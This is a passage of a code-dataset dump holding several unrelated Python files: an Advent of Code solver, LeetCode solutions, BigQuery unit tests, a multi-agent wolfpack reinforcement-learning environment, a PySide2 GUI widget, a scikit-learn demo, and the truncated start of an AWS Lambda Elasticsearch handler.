conn:\n\t\t\t\t\tconn.rollback()\n\t\t\t\tprint (\"error %s\" % e.args[0])\n\ndf = pd.read_sql_query('SELECT * FROM trading_trend limit 5', conn)\nprint(df.head())\nprint(datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S'))\nif conn:\n conn.close()\n","sub_path":"collector/get_daily_sellbuy_trend_krx_mysql.py","file_name":"get_daily_sellbuy_trend_krx_mysql.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"153423675","text":"def get_input():\n with open(\"input.txt\", \"r\") as file:\n operations = file.readlines()\n operations = [line.rstrip() for line in operations]\n return operations\n \ndef get_accumulator(operations):\n accmumulator = 0\n seen = set()\n iterator = 0\n status = True\n while True: \n\n # no loops\n if len(operations) - 1 == iterator :\n status = False\n\n if iterator in seen:\n status = False\n return accmumulator, status\n\n operation, acc = operations[iterator ].split(\" \")\n acc = int(acc)\n seen.add(iterator )\n\n if operation == \"nop\":\n iterator += 1\n if operation == \"acc\":\n accmumulator += acc\n iterator += 1 \n if operation == \"jmp\":\n iterator += acc\n if status == False:\n return accmumulator, True \n return accmumulator, False\n\ndef switch_operations(lines):\n iterator = 0\n new_operations = lines.copy()\n for iterator in range(len(new_operations)): \n operation, acc = lines[iterator].split(\" \")\n acc = int(acc)\n\n if operation == \"nop\":\n operation = \"jmp\"\n elif operation == \"jmp\":\n 
operation = \"nop\"\n new_operations = lines.copy()\n new_operations[iterator] = \" \".join((operation, str(acc)))\n acc, valid = get_accumulator(new_operations)\n if valid:\n return acc\n\n\ndef main():\n operations = get_input()\n accumulator = get_accumulator(operations)[0]\n print(f\"The first answer is : {accumulator}\")\n accumulator = switch_operations(operations)\n print(f\"The second answer is : {accumulator}\")\n\nif __name__ == \"__main__\":\n main()","sub_path":"day8/halting.py","file_name":"halting.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"154190403","text":"# -*- encoding = \"utf-8\" -*-\n__author__ = 'Administrator'\nclass Solution(object):\n def sortColors(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n for i in range(len(nums) - 1,0,-1):\n for j in range(0,i):\n if nums[j] > nums[j + 1]:\n nums[j],nums[j + 1] = nums[j + 1],nums[j]\n\nsol = Solution()\nnums = [0,1,2,0,1,2]\nsol.sortColors(nums)\nfor i in nums:\n print(i,end=\" \")","sub_path":"LeetCode/SortColors.py","file_name":"SortColors.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"199923880","text":"\"\"\"\nUnit Test for the bq module\n\nEnsures the define_dataset and update_labels_and_tag functions have the proper parameters passed\n to them. Ensures update_labels_and_tags function returns a dictionary of either the existing\n labels and or tags or the labels and or tags that need to be updated.\n\nOriginal Issues: DC-757, DC-758\n\nThe intent is to check the proper parameters are passed to define_dataset and update_labels_and_tags\n function as well as to check to make sure the right labels and tags are returned in the\n update_labels_and_tags function.\n\"\"\"\n\n# Python imports\nimport unittest\n\n# Third-party imports\nfrom google.cloud import bigquery\n\n# Project imports\nfrom utils.bq import define_dataset, update_labels_and_tags\n\n\nclass BqTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n print('**************************************************************')\n print(cls.__name__)\n print('**************************************************************')\n\n def setUp(self):\n # Input parameters expected by the class\n self.project_id = 'bar_project'\n self.dataset_id = 'foo_dataset'\n self.description = 'fake_description'\n self.existing_labels_or_tags = {'label': 'value', 'tag': ''}\n self.new_labels_or_tags = {'label': 'new_value', 'new_tag': ''}\n self.updated = {'tag': '', 'label': 'new_value', 'new_tag': ''}\n\n def test_define_dataset(self):\n # Tests if project_id is given\n self.assertRaises(RuntimeError, define_dataset, None, self.dataset_id,\n self.description, self.existing_labels_or_tags)\n\n # Tests if dataset_id is given\n self.assertRaises(RuntimeError, define_dataset, self.project_id, None,\n self.description, self.existing_labels_or_tags)\n\n # Tests if description is given\n self.assertRaises(RuntimeError, define_dataset, self.project_id,\n self.dataset_id, (None or ''),\n self.existing_labels_or_tags)\n\n # Tests if no label or tag is given\n self.assertRaises(RuntimeError, define_dataset, self.project_id,\n self.dataset_id, self.description, None)\n\n # Pre-conditions\n results = define_dataset(self.project_id, self.dataset_id,\n self.description, self.existing_labels_or_tags)\n\n # Post 
conditions\n self.assertIsInstance(results, bigquery.Dataset)\n self.assertEqual(results.labels, self.existing_labels_or_tags)\n\n def test_update_labels_and_tags(self):\n # Tests if dataset_id param is provided\n self.assertRaises(RuntimeError, update_labels_and_tags, None,\n self.existing_labels_or_tags, self.new_labels_or_tags)\n\n # Tests if new_labels_or_tags param is provided\n self.assertRaises(RuntimeError, update_labels_and_tags, self.dataset_id,\n self.existing_labels_or_tags, None)\n\n # Pre-conditions\n results = update_labels_and_tags(self.dataset_id,\n self.existing_labels_or_tags,\n self.new_labels_or_tags, True)\n\n # Post conditions\n self.assertEqual(results, self.updated)\n with self.assertRaises(RuntimeError):\n update_labels_and_tags(self.dataset_id,\n existing_labels_or_tags={'label': 'apples'},\n new_labels_or_tags={'label': 'oranges'},\n overwrite_ok=False)\n","sub_path":"tests/unit_tests/data_steward/utils/bq_test.py","file_name":"bq_test.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"281338645","text":"from random import randint\nfrom random import sample\nfrom player import Player\nfrom food import Food\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass State(object) :\n\t\tdef __init__(self, sight_sideways, sight_radius,num_players, max_food_num, arena_size, levelMap, food_rate = 5, num_game_frames = 100000,coop_radius = 12, groupMultiplier = 2, obsMode = \"PARTIAL\"):\n\t\t\tself.obsMode = obsMode\n\t\t\tself.x_size = arena_size[0]\n\t\t\tself.y_size = arena_size[1]\n\t\t\tself.max_food_num = max_food_num\n\t\t\tself.coordinate_pairs = [(i*2,j*2) for i in range(1,arena_size[0]-1) for j in range(1,arena_size[1]-1)]\n\t\t\tself.obstacleCoord = [(iy*2,ix*2) for ix, row in enumerate(levelMap) for iy, i in enumerate(row) if i]\n\t\t\tself.possibleCoordinates = list(set(self.coordinate_pairs) - set(self.obstacleCoord))\n\t\t\trandom_player_positions = sample(range(len(self.possibleCoordinates)), num_players)\n\t\t\t# coordinates = [self.possibleCoordinates[ii] for ii in random_player_positions]\n\t\t\t# self.player_list = [Player(i,j) for (i,j) in coordinates]\n\t\t\tself.player_list = []\n\t\t\tself.food_list = []\n\t\t\t#Find out about this\n\t\t\tself.food_rate = food_rate\n\t\t\t#Find out about this\n\t\t\tself.waiting_time = food_rate\n\t\t\tself.remaining_game_frames = num_game_frames\n\t\t\tself.sight_sideways = sight_sideways\n\t\t\tself.sight_radius = sight_radius\n\t\t\tself.coopRadius = coop_radius\n\t\t\tself.wolfPerCapture = []\n\t\t\tself.groupMultiplier = groupMultiplier\n\t\t\t#self.addFood()\n\t\t\n\t\tdef reset(self,num_players,levelMap, food_rate = 5, num_game_frames = 100000):\n\t\t\tself.coordinate_pairs = [(i*2,j*2) for i in range(1,self.x_size-1) for j in range(1,self.y_size-1)]\n\t\t\tself.obstacleCoord = [(iy*2,ix*2) for ix, row in enumerate(levelMap) for iy, i in enumerate(row) if i]\n\t\t\tself.possibleCoordinates = list(set(self.coordinate_pairs) - set(self.obstacleCoord))\n\t\t\trandom_player_positions = sample(range(len(self.possibleCoordinates)), num_players)\n\t\t\tcoordinates = [self.possibleCoordinates[ii] for ii in random_player_positions]\n\t\t\tii = 0\n\t\t\tfor player in self.player_list:\n\t\t\t\tplayer.reset(coordinates[ii])\n\t\t\t\tii += 1\n\n\t\t\tii = 0\n\t\t\tfoodCoordinates = list(set(self.possibleCoordinates) - set(coordinates))\n\t\t\trandom_food_positions = sample(range(len(foodCoordinates)), 
len(self.food_list))\n\t\t\tfood_coordinates = [foodCoordinates[jj] for jj in random_food_positions]\n\t\t\tfor food in self.food_list:\n\t\t\t\tfood.reset(food_coordinates[ii])\n\t\t\t\tii += 1\n\n\t\t\tself.food_rate = food_rate\n\t\t\tself.waiting_time = food_rate\n\t\t\tself.remaining_game_frames = num_game_frames\n\t\t\tself.wolfPerCapture = []\n\t\t\t#self.addFood()\n\n\t\tdef updateState(self):\n\t\t\t\n\t\t\tcollectiveAction,collectiveActionFood = self.getCollectiveAct()\n\t\t\tself.update_state(collectiveAction,collectiveActionFood)\n\t\t\n\t\tdef sense(self,newRGB,ExperienceFlag=False,lastExpFlag=False,mode=\"FULL_IMAGE\"):\n\t\t\tself.RGBMatrix = newRGB\n\t\t\tRGBObservation = None\n\t\t\tif mode == \"FULL_IMAGE\":\n\t\t\t\tfor player in self.player_list:\n\t\t\t\t\tif self.obsMode == \"PARTIAL\":\n\t\t\t\t\t\tRGBObservation = self.computeObservation(self.RGBMatrix, player)\n\t\t\t\t\telse:\n\t\t\t\t\t\tRGBObservation = self.computeFullObservation(self.RGBMatrix, player)\n\t\t\t\t\tplayer.sense(RGBObservation,ExperienceFlag=ExperienceFlag,LastExpFlag=lastExpFlag)\n\n\t\t\t\tfor food in self.food_list:\n\t\t\t\t\tif self.obsMode == \"PARTIAL\":\n\t\t\t\t\t\tRGBObservation = self.computeObservation(self.RGBMatrix, food)\n\t\t\t\t\telse:\n\t\t\t\t\t\tRGBObservation = self.computeFullObservation(self.RGBMatrix, food)\n\t\t\t\t\tfood.sense(RGBObservation,ExperienceFlag=ExperienceFlag,LastExpFlag=lastExpFlag)\n\t\t\telse:\n\t\t\t\tplayer_coords = [(player.x,player.y) for player in self.player_list]\n\t\t\t\tfood_coords = [(food.x,food.y) for food in self.food_list if not food.is_dead]\n\t\t\t\tobstacleCoord = [(obstacle[0],obstacle[1]) for obstacle in self.obstacleCoord]\n\t\t\t\tif self.obsMode == \"PARTIAL\":\n\t\t\t\t\tplayer_coords = [(x,y) for (x,y) in player_coords if x>=top and x<bottom and y>=left and y<right]\n\t\t\t\t\tfood_coords = [(x,y) for (x,y) in food_coords if x>=top and x<bottom and y>=left and y<right]\n\t\t\t\t\tobstacleCoord = [(x,y) for (x,y) in obstacleCoord if x>=top and x<bottom and y>=left and y<right]\n\n\t\tdef update_state(self, collectiveAct, collectiveActFood):\n\t\t\tprev_player_position = [player.getIndex() for player in self.player_list]\n\t\t\tprev_player_orientation = [player.orientation for player in self.player_list]\n\t\t\tprev_food_position = [food.getIndex() for food in self.food_list]\n\t\t\tprev_food_orientation = [food.orientation for food in self.food_list]\n\n\t\t\t#Calculate new player locations\n\t\t\tupdate_results = self.calculate_new_position(collectiveAct,prev_player_position,prev_player_orientation)\n\t\t\tpost_player_position = [(a,b) for (a,b,c) in update_results]\n\t\t\tpost_player_orientation = [c for (a,b,c) in update_results]\n\t\t\tfor ii in range(len(self.player_list)):\n\t\t\t\tself.player_list[ii].orientation = post_player_orientation[ii]\n\n\t\t\t#Calculate player intersection\n\t\t\ta, seen, result = post_player_position, set(), {}\n\t\t\tfor idx, item in enumerate(a):\n\t\t\t\tif item not in seen:\n\t\t\t\t\tresult[item] = [idx]\n\t\t\t\t\tseen.add(item)\n\t\t\t\telse:\n\t\t\t\t\tresult[item].append(idx)\n\n\t\t\tgroupings = list(result.values())\n\t\t\tdoubles = [t for t in groupings if len(t) >= 2]\n\t\t\tres = set([item for sublist in doubles for item in sublist])\n\t\t\tfor ii in range(len(self.player_list)):\n\t\t\t\tif ii not in res:\n\t\t\t\t\tself.player_list[ii].setIndex(post_player_position[ii])\n\t\t\t\telse:\n\t\t\t\t\tself.player_list[ii].setIndex(prev_player_position[ii])\n\n\t\t\t#Calculate new food locations\n\t\t\tupdate_results = self.calculate_new_position(collectiveActFood,prev_food_position,prev_food_orientation)\n\t\t\tpost_food_position = [(a,b) for (a,b,c) in update_results]\n\t\t\tpost_food_orientation = [c for (a,b,c) in update_results]\n\t\t\tfor ii in range(len(self.food_list)):\n\t\t\t\tself.food_list[ii].orientation = post_food_orientation[ii]\n\t\t\t\n\t\t\t#Calculate food intersection\n\t\t\ta, seen, result = post_food_position, set(), {}\n\t\t\tfor idx, item in enumerate(a):\n\t\t\t\tif not self.food_list[idx].is_dead:\n\t\t\t\t\tif item not in seen:\n\t\t\t\t\t\tresult[item] = [idx]\n\t\t\t\t\t\tseen.add(item)\n\t\t\t\t\telse:\n\t\t\t\t\t\tresult[item].append(idx)\n\n\t\t\tgroupings = list(result.values())\n\t\t\tdoubles = [t for t in groupings if len(t) >= 2]\n\t\t\tres = set([item for sublist in doubles for item in sublist])\n\t\t\tfor ii in range(len(self.food_list)):\n\t\t\t\tif ii not in res:\n\t\t\t\t\tself.food_list[ii].setIndex(post_food_position[ii])\n\t\t\t\telse:\n\t\t\t\t\tself.food_list[ii].setIndex(prev_food_position[ii])\n\t\t\t\t\t\t\n\t\t\t# Calculate player points and food status\n\t\t\tself.update_food_status(self.player_list)\n\t\t\t\n\t\t\t\n\t\t\tif self.waiting_time == 0:\n\t\t\t\tself.waiting_time = self.food_rate\n\t\t\t\t#self.addFood()\n\n\t\tdef calculate_new_position(self, 
collectiveAct, prev_player_position,prev_player_orientation):\n\t\t\tzipped_data = list(zip(collectiveAct, prev_player_position,prev_player_orientation))\n\t\t\tresult = [self.calculate_indiv_position(a,(b,c),d) for (a,(b,c),d) in zipped_data]\n\t\t\treturn result\n\t\t\n\t\tdef calculate_indiv_position(self,action,pair,orientation):\n\t\t\tx = pair[0]\n\t\t\ty = pair[1]\n\t\t\tnext_x = x\n\t\t\tnext_y = y\n\n\t\t\t# go forward\n\t\t\tif action == 0:\n\t\t\t\t#Facing upwards\n\t\t\t\tif orientation == 0:\n\t\t\t\t\tnext_x -= 2\n\t\t\t\t#Facing right\n\t\t\t\telif orientation == 1:\n\t\t\t\t\tnext_y += 2\n\t\t\t\t#Facing downwards\n\t\t\t\telif orientation == 2:\n\t\t\t\t\tnext_x += 2\n\t\t\t\telse:\n\t\t\t\t\tnext_y -= 2\n\n\t\t\t\tif (next_x,next_y) in set(self.possibleCoordinates):\n\t\t\t\t\treturn (next_x,next_y,orientation)\n\t\t\t\telse:\n\t\t\t\t\treturn (x,y,orientation)\n\t\t\t# Step right\n\t\t\telif action == 1:\n\t\t\t\t#Facing upwards\n\t\t\t\tif orientation == 0:\n\t\t\t\t\tnext_y += 2\n\t\t\t\t#Facing right\n\t\t\t\telif orientation == 1:\n\t\t\t\t\tnext_x += 2\n\t\t\t\t#Facing downwards\n\t\t\t\telif orientation == 2:\n\t\t\t\t\tnext_y -= 2\n\t\t\t\telse:\n\t\t\t\t\tnext_x -= 2\n\n\t\t\t\tif (next_x,next_y) in set(self.possibleCoordinates):\n\t\t\t\t\treturn (next_x,next_y,orientation)\n\t\t\t\telse:\n\t\t\t\t\treturn (x,y,orientation)\n\t\t\t#Step back\n\t\t\telif action == 2:\n\t\t\t\t#Facing upwards\n\t\t\t\tif orientation == 0:\n\t\t\t\t\tnext_x += 2\n\t\t\t\t#Facing right\n\t\t\t\telif orientation == 1:\n\t\t\t\t\tnext_y -= 2\n\t\t\t\t#Facing downwards\n\t\t\t\telif orientation == 2:\n\t\t\t\t\tnext_x -= 2\n\t\t\t\telse:\n\t\t\t\t\tnext_y += 2\n\n\t\t\t\tif (next_x,next_y) in set(self.possibleCoordinates):\n\t\t\t\t\treturn (next_x,next_y,orientation)\n\t\t\t\telse:\n\t\t\t\t\treturn (x,y,orientation)\n\t\t\t#Step left\n\t\t\telif action == 3:\n\t\t\t\t#Facing upwards\n\t\t\t\tif orientation == 0:\n\t\t\t\t\tnext_y -= 2\n\t\t\t\t#Facing right\n\t\t\t\telif orientation == 1:\n\t\t\t\t\tnext_x -= 2\n\t\t\t\t#Facing downwards\n\t\t\t\telif orientation == 2:\n\t\t\t\t\tnext_y += 2\n\t\t\t\telse:\n\t\t\t\t\tnext_x += 2\n\n\t\t\t\tif (next_x,next_y) in set(self.possibleCoordinates):\n\t\t\t\t\treturn (next_x,next_y,orientation)\n\t\t\t\telse:\n\t\t\t\t\treturn (x,y,orientation)\n\t\t\t#stay still\n\t\t\telif action == 4:\n\t\t\t\treturn (x,y,orientation)\n\t\t\t#rotate left\n\t\t\telif action == 5:\n\t\t\t\tnew_orientation = 0\n\t\t\t\tif orientation == 0:\n\t\t\t\t\tnew_orientation = 3\n\t\t\t\telif orientation == 1:\n\t\t\t\t\tnew_orientation = 0\n\t\t\t\telif orientation == 2:\n\t\t\t\t\tnew_orientation = 1\n\t\t\t\telse:\n\t\t\t\t\tnew_orientation = 2\n\n\t\t\t\treturn (x,y,new_orientation)\n\t\t\t#rotate right\n\t\t\telse:\n\t\t\t\tnew_orientation = 0\n\t\t\t\tif orientation == 0:\n\t\t\t\t\tnew_orientation = 1\n\t\t\t\telif orientation == 1:\n\t\t\t\t\tnew_orientation = 2\n\t\t\t\telif orientation == 2:\n\t\t\t\t\tnew_orientation = 3\n\t\t\t\telse:\n\t\t\t\t\tnew_orientation = 0\n\n\t\t\t\treturn (x,y,new_orientation)\n\n\t\tdef update_food_status(self,player_list):\n\t\t\tfor food in self.food_list:\n\t\t\t\tfood.add_point(0)\n\n\t\t\tenumFood = list(enumerate(self.food_list))\n\t\t\tfood_locations = [(food.x,food.y) for idx,food in enumFood if not food.isDead()]\n\t\t\tfood_id = [idx for idx,food in enumFood if not food.isDead()]\n\n\t\t\tplayer_locations = [(player.x,player.y) for player in self.player_list]\n\t\t\tset_of_food_location = 
set(food_locations)\n\t\t\trewardListPlayer = [0]*len(player_locations)\n\n\t\t\tfor player in player_list:\n\t\t\t\tif (player.getIndex() in set_of_food_location):\n\t\t\t\t\tcenter = player.getIndex()\n\t\t\t\t\tcenter = (center[0]+1, center[1]+1)\n\t\t\t\t\tenumerated = enumerate(player_locations)\n\t\t\t\t\tclose = [x for (x,(a,b)) in enumerated if abs(a-center[0]) + abs(b-center[1]) <= self.coopRadius]\n\t\t\t\t\tfor x in close:\n\t\t\t\t\t\tif len(close) < 2:\n\t\t\t\t\t\t\trewardListPlayer[x] += len(close)/4.0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\trewardListPlayer[x] += self.groupMultiplier*len(close)/4.0\n\t\t\t\t\tself.wolfPerCapture.append(len(close))\n\t\t\t\t\tfood_index = food_locations.index(player.getIndex())\n\t\t\t\t\tself.food_list[food_id[food_index]].add_point(-1/4.0)\n\t\t\t\t\tself.food_list[food_id[food_index]].setDead()\n\n\t\t\tfor ii in range(len(rewardListPlayer)):\n\t\t\t\tself.player_list[ii].add_player_point(rewardListPlayer[ii])\n\n\t\tdef update_status(self):\n\t\t\tfor food in self.food_list:\n\t\t\t\tif food.isDead():\n\t\t\t\t\tfood.remaining_time -= 1\n\t\t\n\t\t#def addFood(self):\n\t\t#\twhile len(self.food_list) < self.max_food_num:\n\t\t#\t\tpossibleCoordinates = list(set(self.possibleCoordinates) - set([(player.x,player.y) for player in self.player_list]))\n\t\t#\t\tpossibleCoordinates = list(set(possibleCoordinates) - set([(food.x,food.y) for food in self.food_list]))\n\t\t#\t\tfood_positions = sample(range(len(possibleCoordinates)), 1)\n\t\t#\t\tchosenCoordinate = possibleCoordinates[food_positions[0]]\n\t\t#\t\tself.food_list.append(Food(chosenCoordinate[0],chosenCoordinate[1]))\n\n\n\t\tdef setEpsilon(self,epsilon):\n\t\t\tfor player in self.player_list:\n\t\t\t\tplayer.epsilon = epsilon\n\t\t\tfor food in self.food_list:\n\t\t\t\tfood.epsilon = epsilon\n\n\n\t\tdef setListOfPlayers(self, listOfPlayers):\n\t\t\tself.player_list = listOfPlayers\n\n\t\tdef setListOfFoods(self,listOfFoods):\n\t\t\tself.food_list = listOfFoods\n\n\t\tdef computeObservation(self, RGBMatrix, player):\n\t\t\tRGBRep = None\n\t\t\tif player.orientation == 3:\n\t\t\t# Facing left\n\t\t\t\tx_left = (player.x+(self.sight_radius)*2) - ((self.sight_sideways//2)*2)\n\t\t\t\tx_right = (player.x+ (self.sight_radius)*2) + ((self.sight_sideways//2)*2) + 2 \n\t\t\t\ty_up = (player.y+(self.sight_radius)*2) - (2*self.sight_radius)\n\t\t\t\ty_down = (player.y+(self.sight_radius)*2) + 2\n\t\t\t\tRGBRep = RGBMatrix[int(x_left):int(x_right),int(y_up):int(y_down)]\n\t\t\t\tRGBRep = RGBRep.transpose((1,0,2))\n\t\t\t\tRGBRep = np.fliplr(RGBRep)\n\t\t\telif player.orientation == 1:\n\t\t\t\t# Facing right\n\t\t\t\tx_left = (player.x+(self.sight_radius)*2) - ((self.sight_sideways//2)*2)\n\t\t\t\tx_right = (player.x+ (self.sight_radius)*2) + ((self.sight_sideways//2)*2) + 2 \n\t\t\t\ty_up = (player.y+(self.sight_radius)*2) + (2*self.sight_radius) + 2\n\t\t\t\ty_down = (player.y+(self.sight_radius)*2)\n\t\t\t\tRGBRep = RGBMatrix[int(x_left):int(x_right),int(y_down):int(y_up)]\n\t\t\t\tRGBRep = RGBRep.transpose((1,0,2))\n\t\t\t\tRGBRep = RGBRep[::-1]\n\t\t\telif player.orientation == 0:\n\t\t\t\t# Facing up\n\t\t\t\tx_left = (player.x+(self.sight_radius)*2) - (2*self.sight_radius)\n\t\t\t\tx_right = (player.x+ (self.sight_radius)*2) + 2\n\t\t\t\ty_up = (player.y+(self.sight_radius)*2) - ((self.sight_sideways//2)*2)\n\t\t\t\ty_down = (player.y+(self.sight_radius)*2) + ((self.sight_sideways//2)*2) + 2 \n\t\t\t\tRGBRep = RGBMatrix[int(x_left):int(x_right),int(y_up):int(y_down)]\n\t\t\telif 
player.orientation == 2:\n\t\t\t\t# Facing down\n\t\t\t\tx_left = (player.x+(self.sight_radius)*2)\n\t\t\t\tx_right = (player.x+ (self.sight_radius)*2) + (2*self.sight_radius) + 2\n\t\t\t\ty_up = (player.y+(self.sight_radius)*2) - ((self.sight_sideways//2)*2)\n\t\t\t\ty_down = (player.y+(self.sight_radius)*2) + ((self.sight_sideways//2)*2) + 2 \n\t\t\t\tRGBRep = RGBMatrix[int(x_left):int(x_right),int(y_up):int(y_down)]\n\t\t\t\tRGBRep = np.fliplr(RGBRep)\n\t\t\t\tRGBRep = RGBRep[::-1]\n\n\t\t\treturn RGBRep\n \n\t\tdef computeFullObservation(self, RGBMatrix, player):\n\t\t\tRGBRep = None\n\t\t\tx_left = (self.sight_radius)*2\n\t\t\tx_right = -(self.sight_radius)*2 \n\t\t\ty_up = 2*self.sight_radius\n\t\t\ty_down = -2*self.sight_radius\n\t\t\tRGBRep = RGBMatrix[x_left:x_right,y_up:y_down]\n\t\t\tif player.orientation == 3:\n\t\t\t\t# Facing left\n\t\t\t\tRGBRep = RGBRep.transpose((1,0,2))\n\t\t\t\tRGBRep = np.fliplr(RGBRep)\n\t\t\telif player.orientation == 1:\n\t\t\t\t# Facing right\n\t\t\t\tRGBRep = RGBRep.transpose((1,0,2))\n\t\t\t\tRGBRep = RGBRep[::-1]\n\t\t\telif player.orientation == 0:\n\t\t\t\t# Facing up \n\t\t\t\tRGBRep = RGBRep\n\t\t\telif player.orientation == 2:\n\t\t\t\t# Facing down\n\t\t\t\tRGBRep = np.fliplr(RGBRep)\n\t\t\t\tRGBRep = RGBRep[::-1]\n\n\t\t\treturn RGBRep\n\n\t\tdef computeObservationBounds(self, player):\n\t\t\ttop, bottom, left, right = 0, 0, 0, 0\n\t\t\tif player.orientation == 3:\n\t\t\t# Facing left\n\t\t\t\ttop = player.x - ((self.sight_sideways/2)*2)\n\t\t\t\tbottom = player.x + ((self.sight_sideways/2)*2) + 2 \n\t\t\t\tleft = player.y- (2*self.sight_radius)\n\t\t\t\tright = player.y + 2\n\t\t\telif player.orientation == 1:\n\t\t\t\t# Facing right\n\t\t\t\ttop = player.x - ((self.sight_sideways/2)*2)\n\t\t\t\tbottom = player.x + ((self.sight_sideways/2)*2) + 2 \n\t\t\t\tright = player.y + (2*self.sight_radius) + 2\n\t\t\t\tleft = (player.y+(self.sight_radius)*2)\n\t\t\telif player.orientation == 0:\n\t\t\t\t# Facing up\n\t\t\t\ttop = player.x - (2*self.sight_radius)\n\t\t\t\tbottom = player.x + 2\n\t\t\t\tleft = player.y - (self.sight_sideways/2)*2\n\t\t\t\tright = player.y + ((self.sight_sideways/2)*2) + 2 \n\t\t\telif player.orientation == 2:\n\t\t\t\t# Facing down\n\t\t\t\ttop = player.x\n\t\t\t\tbottom = player.x + (2*self.sight_radius) + 2\n\t\t\t\tleft = player.y - ((self.sight_sideways/2)*2)\n\t\t\t\tright = player.y + ((self.sight_sideways/2)*2) + 2 \n\n\t\t\treturn top,bottom,left,right\n\n\t\t\n\t\tdef displayImage(self,image,counter):\n\t\t\tplt.imshow(image)\n\t\t\tplt.savefig('image' + str(counter) +'.png')\n\t\t\t#plt.show()\n\n\t\tdef checkpointing(self, step):\n\t\t\tfor player in self.player_list:\n\t\t\t\tplayer.checkpointing(step)\n\n\n\n\n\n\n\n\n","sub_path":"MultiAgentRL/WolfpackRandom/gameplay.py","file_name":"gameplay.py","file_ext":"py","file_size_in_byte":16647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"596754440","text":"from PySide2.QtWidgets import QVBoxLayout, QWidget\nfrom PySide2.QtCore import QObject, Signal\nfrom ..Utility.StyleUtils import ContentFrame, UtilityFrame\nfrom .UtilityWidgets import ButtonBox, WidgetsArea\nfrom .InputWidgets import AbstractAddWidget, TransactionWidget, TypeWidget, ProductWidget\n\n\nclass AddElementWidget(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.btnbox = ButtonBox()\n        self.area = WidgetsArea()\n        self.handler = AddHandler(self.btnbox, self.area)\n\n        self.init_ui()\n\n    def init_ui(self):\n        
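The transpose/flip pairs in `computeFullObservation` above rotate the cropped window so every agent perceives the frame egocentrically, as if facing up. A minimal standalone check of the same array operations (the tiny frame here is just a stand-in for the RGB window):

```python
import numpy as np

frame = np.arange(12).reshape(2, 2, 3)  # HxWx3 stand-in for the RGB window

facing_left = np.fliplr(frame.transpose((1, 0, 2)))   # orientation == 3
facing_right = frame.transpose((1, 0, 2))[::-1]       # orientation == 1
facing_down = np.fliplr(frame)[::-1]                  # orientation == 2

print(facing_left.shape, facing_right.shape, facing_down.shape)
```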
self.setLayout(QVBoxLayout())\n self.layout().setSpacing(0)\n self.layout().setMargin(0)\n self.layout().addWidget(UtilityFrame(self.btnbox))\n self.layout().addWidget(ContentFrame(self.area))\n\n\nclass AddHandler(QObject):\n confirm_clicked = Signal(AbstractAddWidget)\n\n def __init__(self, btnbox: ButtonBox, area: WidgetsArea):\n super().__init__()\n self.btnbox = btnbox\n self.area = area\n self.current_widget = TypeWidget\n self._connect_buttons()\n\n def _connect_buttons(self):\n self.btnbox.typebtn.clicked.connect(\n lambda: self.change_type(0))\n self.btnbox.prodbtn.clicked.connect(\n lambda: self.change_type(1))\n self.btnbox.transbtn.clicked.connect(\n lambda: self.change_type(2))\n self.btnbox.plsbtn.clicked.connect(self.add_new_widget)\n self.btnbox.mnsbtn.clicked.connect(\n lambda: self.area.remove_widget(0))\n\n def change_type(self, t: int):\n self.area.clear()\n types = {0: TypeWidget,\n 1: ProductWidget,\n 2: TransactionWidget}\n self.current_widget = types[t]\n\n def _configure_new_widget(self):\n widget = self.current_widget()\n widget.confirmbtn.clicked.connect(\n lambda: self.confirm_clicked.emit(widget))\n configured_widget = ContentFrame(widget)\n return configured_widget\n\n def add_new_widget(self):\n widget = self._configure_new_widget()\n self.area.add_widget(widget)\n","sub_path":"Gui/AddPage/MainWidget.py","file_name":"MainWidget.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"25417066","text":"class Solution:\n def fourSumCount(self, A: List[int], B: List[int], C: List[int], D: List[int]) -> int:\n AB = [a+b for a in A for b in B]\n CD = [c+d for c in C for d in D]\n \n # Two sum from AB and CD\n counts = 0\n CD_count = collections.Counter(CD)\n for num in AB:\n counts += CD_count.get(-num, 0)\n \n return counts\n","sub_path":"LeetCode-Solutions/454. Four Sum.py","file_name":"454. Four Sum.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"405471440","text":"# -*- coding: utf-8 -*-\n\nfrom sklearn.tree import DecisionTreeClassifier\n\nX = [[1, 1], [1, 1], [1, 0], [0, 1], [0, 1]]\ny = [0, 0, 1, 1, 1]\nmodel = DecisionTreeClassifier()\nmodel.fit(X, y)\nlabel1 = model.predict([[1, 1]])\nlabel2 = model.predict([[0, 0]])\nprint('Label1: {}; Label2: {}'.format(label1, label2))\n","sub_path":"test/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"388735467","text":"import json\n\nfrom requests_aws4auth import AWS4Auth\nimport boto3\nimport requests\n\nimport traceback\n\n''' \nInputs:\n product_name: string (optional)\n page: integer (optional)\n'''\n# Function to include the ID and extract docs\ndef getData(x):\n obj = x['_source']\n obj['_id'] = x['_id']\n return obj\n\ndef lambda_handler(event, context):\n try:\n # Set up some credentials for AWS\n region = 'us-east-2' # For example, us-west-1\n service = 'es'\n credentials = boto3.Session().get_credentials()\n awsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, service, session_token=credentials.token)\n\n url = 'http://search-slp-es-database-7docgoiohso2wq5yypuwhvsuwq.us-east-2.es.amazonaws.com/'\n\n # Check if request has `page`. 
